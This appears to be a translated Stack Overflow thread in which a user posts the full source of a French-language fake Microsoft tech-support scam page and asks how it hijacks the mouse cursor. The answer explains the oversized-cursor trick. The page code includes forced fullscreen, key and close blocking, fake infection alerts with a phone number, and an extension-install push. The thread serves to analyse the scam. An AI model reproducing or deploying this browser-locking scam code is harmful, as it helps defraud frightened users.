技术支持诈骗者总是想方设法让 window 难以关闭以达到诈骗目的。
在这种情况下,这段代码的目标是让用户难以检查:“防止此页面创建其他对话框”,否则受害者可以关闭窗口。它以某种方式扰乱了鼠标光标,使受害者难以将鼠标悬停在复选框上。我不明白这是怎么回事:
我为 StackOverflow 删除的页面中有一个大 Blob ,但可以在此处找到完整版本:https://pastebin.com/E57AQjGj
对于 future 的访问者,这里是光标(来自 Tschallacka 的回答),带有灰色背景(通常是透明的):
这是截至 2018 年 5 月典型的 Microsoft 技术支持骗局的代码:
<html xmlns="http:/www.w3.org/1999/xhtml">
<head>
<meta name="robots" content="noindex,nofollow">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title> Information </title>
<link href="index_files/bootstrap.css" rel="stylesheet">
<link href="index_files/style.css" rel="stylesheet">
<link href="index_files/translator.css" id="SL_Style" type="text/css" rel="stylesheet">
<link href="index_files/alert.css" rel="stylesheet">
<link href="https://chrome.google.com/webstore/detail/ghbmnnjooekpmoecnnnilnnbdlolhkhi" rel="chrome-webstore-item">
<style>
html {
overflow: hidden;
}
</style>
<script>
/*
window.alert = function(al) {
return function(msg) {
al(msg);
var event = new CustomEvent('alert_clicked');
document.dispatchEvent(event);
};
}(window.alert);
document.addEventListener('alert_clicked', function() {
setTimeout(function() {
toggleFullScreen();
}, 1000)
}, false);
*/
</script>
<script>
function getURLParameter(name) {
return decodeURI((RegExp(name + '=' + '(.+?)(&|$)').exec(location.search) || [,null])[1] || '');
}
var error = getURLParameter('error');
</script>
<audio id="play" loop><source src="fr.mp3" type="audio/mpeg"></audio>
<!--<audio autoplay="autoplay" loop="">
<source src="index_files/gb.mp3" type="audio/mpeg">
</audio>-->
<script type="text/javascript">
var stroka = "<tr><td valign='top'><table width='100%' height='61' cellpadding='0' cellspacing='0' border='0'><tr><td width='766'><img src='data:image/jpeg;base64,/Z'></td></tr></table></td></tr>";
</script>
<script type="text/javascript">
function toggleFullScreen() {
if (!document.fullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement) {
if (document.documentElement.requestFullscreen) {
document.documentElement.requestFullscreen();
} else if (document.documentElement.mozRequestFullScreen) {
document.documentElement.mozRequestFullScreen();
} else if (document.documentElement.webkitRequestFullscreen)
{document.documentElement.webkitRequestFullscreen(Element.ALLOW_KEYBOARD_INPUT);
}
}
}
</script>
<script type="text/javascript">
document.addEventListener('keyup', function(es) {
if (es.keyCode === 27) {
toggleFullScreen();
}
}, false);
</script>
<script type="text/javascript">
document.addEventListener('keyup', function(e) {
if (e.keyCode === 122 || e.keyCode === 17 || e.keyCode === 18 || e.keyCode === 13) {
document.getElementById('map').innerHTML = stroka;
toggleFullScreen();
}
}, false);
</script>
<script type="text/javascript">
window.onload = function () {
document.onclick = function (e) {
e = e || event;
target = e.target || e.srcElement;
if (target.tagName === "DIV") {
toggleFullScreen();
document.body.style.cursor = 'not-allowed';
document.getElementById('map').innerHTML = stroka;
document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
} else {
toggleFullScreen();
document.body.style.cursor = 'not-allowed';
document.getElementById('map').innerHTML = stroka;
document.getElementById('fa').innerHTML = "<iframe src='#' width='12' height='12' style='position: absolute; left: -25px;'></iframe>";
}
}
}
</script>
<script type="text/javascript">
addEventListener("click", function() {
document.getElementById('map').innerHTML = stroka;
document.getElementById("play").play();
if (!isFullScreen) {
var el = document.documentElement,
rfs = el.requestFullScreen || el.webkitRequestFullScreen || el.mozRequestFullScreen;
rfs.call(el);
}
});
</script>
</head>
<body onkeydown="return hCPNapvlhFicLoDm(event)" oncontextmenu="return false" style="cursor: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAMAAAD04JH5AAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAPUExURQAAAAICAgAAAP///5WVlXiCGdAAAAADdFJOUwD8ZX+n/7gAAABvSURBVHja7dbBAUAwEABBQf81i6CGfZipYB3J2bY/GnnAHgec9QjOY9QBccEMaAvugLRgBZQFT0BY8AZ0BV9AVvB8hEt3D8SnYIz2FMxtlI7gfvVzBN1OXM9+1Dsx/ykAAAAAAAAAAAAAAAAAgNcFnc4A9qwo+wMAAAAASUVORK5CYII=") 128 128, crosshair;">
<!-- <canvas id="canvasElement"></canvas> -->
<audio autoplay="autoplay" loop="">
<source src="fr.mp3" type="audio/mpeg">
</audio>
<div id="coFrameDiv" style="height:0px;display:none;">
<iframe id="coToolbarFrame" src="index_files/a.htm" style="height:0px;width:100%;display:none;"></iframe>
</div>
<a id="elem" href="#" style="display: none;"></a>
<span id="audioarea"></span>
<table width="100%" cellspacing="0" cellpadding="0" border="0">
<tbody>
<tr>
<td valign="top" align="center"><div id="map"></div>
</td>
</tr>
</tbody>
</table>
<nav class="navbar navbar-default navbar-static-tops">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#">
<img src="index_files/windows.png" alt="Windows">
</a>
</div>
<div id="navbar" class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Store<span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">Téléchargement </a></li>
<li><a href="#">Devices</a></li>
<li><a href="#">Software</a></li>
<li><a href="#">Apps</a></li>
<li><a href="#">Games</a></li>
</ul>
</li>
<li class="dropdown">
<a href="#" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false">Products<span class="caret"></span></a>
<ul class="dropdown-menu">
<li><a href="#">Software & services</a></li>
<li><a href="#">Devices & Xbox</a></li>
<li><a href="#">For business</a></li>
</ul>
</li>
<li><a href="#">Support</a></li>
</ul>
<ul class="nav navbar-nav navbar-right">
<li><a href="#"><strong>Support technique : 09 70 38 74 17</strong></a></li>
</ul>
</div><!--/.nav-collapse-->
</div>
</nav>
<div class="container">
<div class="jumbotron">
<div class="row">
<div class="col-xs-6 text-left">
<h2>Attention</h2>
Ne pas éteindre ou réinitialiser votre ordinateur.
</br></br>
Votre ordinateur a été infecté.
</br></br>
Les données suivantes peuvent être compromises :
<br/><br/>
1. Mots de passe.
<br/>
2. Historique du navigateur.
<br/>
3. Informations sensibles (Cartes de crédit).
<br/>
4. Fichiers sur le disque dur.
<br/>
<br/>
Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
<br><br>
Appelez immédiatement au : <b>09 70 38 74 17</b> (Appel gratuit).
<br><br>
Ne pas ignorer cette alerte critique. Si vous fermez cette page, votre accès à l'ordinateur sera désactivé pour éviter d'autres dommages sur notre réseau.
<br><br>
Contactez-nous immédiatement afin que nos ingénieurs puissent vous guider à travers le processus de suppression par téléphone. Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
</div>
</div>
</div>
</div>
<footer class="footer">
<div class="container">
<div class="row">
<div class="col-md-4" style="text-align:left;">
<h4>Support</h4>
<ul style="padding:0px;">
<li style="list-style: none; padding:10px 0px;"><a>Account support</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Supported products list</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Product support lifecycle</a></li>
</ul>
</div>
<div class="col-md-4" style="text-align:left;">
<h4>Security</h4>
<ul style="padding:0px;">
<li style="list-style: none; padding:10px 0px;"><a>Safety & Security Center</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Download Security Essentials</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Malicious Software Removal Tool</a></li>
</ul>
</div>
<div class="col-md-4" style="text-align:left;">
<h4>Popular topics</h4>
<ul style="padding:0px;">
<li style="list-style: none; padding:10px 0px;"><a>Report a support scam</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Disability Answer Desk</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Locate Windows addresses worldwide</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Windows 10 help & how-to</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Windows 10 Mobile help & how-to</a></li>
<li style="list-style: none; padding:10px 0px;"><a>Can't find Office applications in Windows 10,
Windows 8, or WIndows 7?</a></li>
</ul>
</div>
</div>
<div class="row" style="font-size: 1.2rem; padding:30px 0px;">
<div style="float:left;"><span class="glyphicon glyphicon-cd"></span><span>English(United States)</span>
</div>
<div style="float:right;">
<span style="padding:0px 15px;">Terms of use</span>
<span style="padding:0px 15px;">English(United States)</span>
<span style="padding:0px 15px;">Trademarks</span>
<span style="padding:0px 15px;">@2016 Windows</span>
</div>
</div>
</div>
</footer>
<div id="chrome-alerts" class="chrome-alert">
<div>
<a href="javascript:openlink()" class="cross">×</a>
<h1>Attention</h1>
<div class="content-box" id="alert-content-box">
<p>
Votre ordinateur a été infecté.
</br></br>
Les données suivantes peuvent être compromises :
<br/><br/>
1. Mots de passe.
<br/>
2. Historique du navigateur.
<br/>
3. Informations sensibles (Cartes de crédit).
<br/>
4. Fichiers sur le disque dur.
<br/>
<br/>
Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
<br><br>
Appelez immédiatement au : <b>09 70 38 74 17</b> (Appel gratuit).
<br><br>
Ne pas ignorer cette alerte critique. Si vous fermez cette page, votre accès à l'ordinateur sera désactivé pour éviter d'autres dommages sur notre réseau.
<br><br>
Contactez-nous immédiatement afin que nos ingénieurs puissent vous guider à travers le processus de suppression par téléphone. Veuillez nous appeler dans les 5 prochaines minutes pour éviter que votre ordinateur ne soit désactivé.
</p>
</div>
<label style="font-size: 12px;"><input type="checkbox"> Empêcher les boîtes de dialogue supplémentaires</label>
<div class="action_buttons">
<a class="active" id="leave_page">OK</a>
</div>
</div>
</div>
<script>
var subid = '';
var clickid = '';
var postback = 'wHBAN004C9IFC3951PRAFUP0';
var cl = false;
var isFullScreen = !(!document.fullscreenElement && !document.msFullscreenElement && !document.mozFullScreenElement && !document.webkitFullscreenElement);
window.onload = function () {
var langs = {
en: {
img: 'ru_new.png',
h3: 'System notification!',
p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
},
ru: {
img: 'ru_new.png',
h3: '????????? ???????????!',
p: '???????????? ???????? ? ????????? ??????? ?????????? ??? ?????? ????????. ??????? "??" ? ?????????? ???????????? ??????????.'
},
de: {
img: 'ru_new.png',
h3: 'Systembenachrichtigung!',
p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
},
fr: {
img: 'ru_new.png',
h3: 'Avis de système !',
p: 'Important additions for your browser are downloading and installation is in progress. Press OK and install the extensions!'
},
es: {
img: 'ru_new.png',
h3: '¡Notificación del sistema!',
p: 'Se está realizando la descarga e instalación de una extensión importante para su navegador. Haga clic en "Aceptar" e instale la extensión propuesta.'
},
pt: {
img: 'ru_new.png',
h3: 'Mensagem de sistema!',
p: 'Importantes adições para o seu navegador estão sendo transferidas ea instalação está em andamento. Pressione OK e instale as extensões!'
},
};
if (window.chrome !== undefined && window.chrome.webstore && window.chrome.webstore.install) {
if (document.cookie.indexOf('tmp_name=') == -1) {
setCookie('tmp_name', 'landing', 24);
}
var lang = langs[navigator.language];
hTRnKeAy1lgYB4La();
if (lang) {
document.querySelector('header img').src = lang.img;
document.querySelector('.gR3SfJr5l9O4jbWa h3').innerText = lang.h3;
document.querySelector('.gR3SfJr5l9O4jbWa p').innerText = lang.p;
}
if (document.cookie.indexOf('c_open' + '=') === -1) {
setCookie('c_open', 'landing', 1);
window.location.href = window.location.href;
}
try {
document.querySelector('footer').style.display = 'none';
document.querySelector('header').style.display = 'block';
} catch (e) {}
} else {
window.onbeforeunload = null;
location.assign('#');
}
};
window.onresize = function () {
if (document.querySelector('header')) {
if (window.innerHeight != screen.height) {
document.querySelector('header').style.display = 'block';
document.querySelector('footer').style.display = 'none';
}
else {
document.querySelector('header').style.display = 'none';
document.querySelector('footer').style.display = 'block';
}
}
};
window.onbeforeunload = function (ev) {
return "You have to install extension !";
};
function kzogExQSrDChY4Iq() {
eKxJS2GzrfWPEjgm();
setTimeout(function () {
document.body.webkitRequestFullscreen();
}, 1000);
}
function setCookie(a, b, c) {
var d = '';
if (c) {
var e = new Date();
e.setTime(e.getTime() + (c * 60 * 60 * 1000));
d = '; expires=' + e.toUTCString()
}
console.log(d);
document.cookie = a + "=" + b + d + ";path=/";
}
function hTRnKeAy1lgYB4La() {
if (document.cookie.indexOf('c_name' + '=') !== -1 && document.cookie.indexOf('tmp_name=') !== -1) {
window.onbeforeunload = null;
location.assign('#');
}
}
function gpAkSJDl9ENT5gLQ() {
try {
document.querySelector('footer').style.display = 'block';
document.querySelector('header').style.display = 'none';
} catch (e) {}
}
function eKxJS2GzrfWPEjgm() {
gpAkSJDl9ENT5gLQ();
try {
document.webkitCancelFullScreen();
} catch (e) { }
try {
document.cancelFullscreen();
} catch (e) { }
var xhr = new XMLHttpRequest();
xhr.open('GET', "#", true);
xhr.send();
cl = true;
chrome.webstore.install('', function () {
window.onbeforeunload = null;
var xhr = new XMLHttpRequest();
xhr.open('GET', "#", true);
xhr.onload = function () {
if (clickid) {
var xhrPostback = new XMLHttpRequest();
xhrPostback.open('GET', '#', true);
xhrPostback.onload = function () {
var xhrPostback1 = new XMLHttpRequest();
xhrPostback1.open('GET', '#', true);
xhrPostback1.onload = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.onerror = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.send();
};
xhrPostback.onerror = function () {
var xhrPostback1 = new XMLHttpRequest();
xhrPostback1.open('GET', '#', true);
xhrPostback1.onload = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.onerror = function () {
var xhrPostback3 = new XMLHttpRequest();
xhrPostback3.open('GET', '#', true);
xhrPostback3.onload = function () {
open('#', '_self');
};
xhrPostback3.onerror = function () {
open('#', '_self');
};
xhrPostback3.send();
};
xhrPostback1.send();
};
xhrPostback.send();
} else if (subid) {
var xhrPostback = new XMLHttpRequest();
xhrPostback.open('GET', '#' + subid, true);
xhrPostback.onload = function () {
open('#', '_self');
};
xhrPostback.onerror = function () {
open('#', '_self');
};
xhrPostback.send();
} else if (postback) {
var xhrPostback = new XMLHttpRequest();
xhrPostback.open('GET', '#' + postback, true);
xhrPostback.onload = function () {
open('#', '_self');
};
xhrPostback.onerror = function () {
open('#', '_self');
};
xhrPostback.send();
} else {
open('#', '_self');
}
};
xhr.onerror = function () {
open('#', '_self');
};
xhr.send();
}, function (error) {
cl = false;
var xhr = new XMLHttpRequest();
xhr.open('GET', "#", true);
xhr.send();
console.log(error);
document.querySelector('footer').style.display = 'none';
try {
document.querySelector('header').style.display = 'block';
} catch (v) {
}
setTimeout(function () {
try {
document.webkitCancelFullScreen();
} catch (e) { }
try {
document.cancelFullscreen();
} catch (e) { }
}, 100);
});
}
function hCPNapvlhFicLoDm(e) {
if (e.which === 123 || e.which === 17) {
return false;
}
}
function hxvw7JrbMUZBqVhN() {
var c = confirm("You should install the chrome extension!");
if (!c) {
hxvw7JrbMUZBqVhN();
}
}
// document.body.addEventListener('keyup', f5WOxk2dF74GMRLf);
document.body.addEventListener('keyup', kzogExQSrDChY4Iq);
document.body.addEventListener('click', kzogExQSrDChY4Iq);
function f5WOxk2dF74GMRLf() {
return false;
}
function dsfsf(e) {
e = e ? e : window.event;
var from = e.relatedTarget || e.toElement;
if (!from || from.nodeName === "HTML") {
// hxvw7JrbMUZBqVhN()
window.location.href = window.location.href;
}
}
function addEvent(obj, evt, fn) {
if (obj.addEventListener) {
obj.addEventListener(evt, fn, false);
} else if (obj.attachEvent) {
obj.attachEvent("on" + evt, fn);
}
}
function removeEvent(obj, evt, fn) {
if (obj.removeEventListener) {
obj.removeEventListener(evt, fn, false);
} else if (obj.detachEvent) {
obj.detachEvent("on" + evt, fn);
}
}
//addEvent(document, "mouseout", dsfsf);
window.onblur = function() {
if (!isFullScreen && !cl) {
window.location.href = window.location.href;
}
};
</script>
<script type="text/javascript">
var nomer = getURLParameter("n");
var red = getURLParameter("red");
if (red === "y") {
document.location.href=("https://" + document.location.host + document.location.pathname + "?n=" + nomer + "&error=" + error);
}
</script>
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,3638954,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img src="//sstatic1.histats.com/0.gif?3638954&101" alt="free hit counter code" border="0"></a></noscript>
</body>
</html>
最佳答案
他们通过用 128x128px 的图像替换光标来做到这一点。
查看下面的代码片段并将鼠标悬停在按钮上。
这样,您认为自己点击的地方实际上并没有点击。您看不到点击的位置,而且总是会错过微小的复选框标记。
button {
cursor: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAIAAAACACAMAAAD04JH5AAAABGdBTUEAALGPC/xhBQAAAAFzUkdCAK7OHOkAAAAPUExURQAAAAICAgAAAP///5WVlXiCGdAAAAADdFJOUwD8ZX+n/7gAAABvSURBVHja7dbBAUAwEABBQf81i6CGfZipYB3J2bY/GnnAHgec9QjOY9QBccEMaAvugLRgBZQFT0BY8AZ0BV9AVvB8hEt3D8SnYIz2FMxtlI7gfvVzBN1OXM9+1Dsx/ykAAAAAAAAAAAAAAAAAgNcFnc4A9qwo+wMAAAAASUVORK5CYII=") 128 128, crosshair;
}<button>
test
</button>关于javascript - 这部分代码如何能够修改看似在浏览器窗口之外的鼠标指针?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/50135235/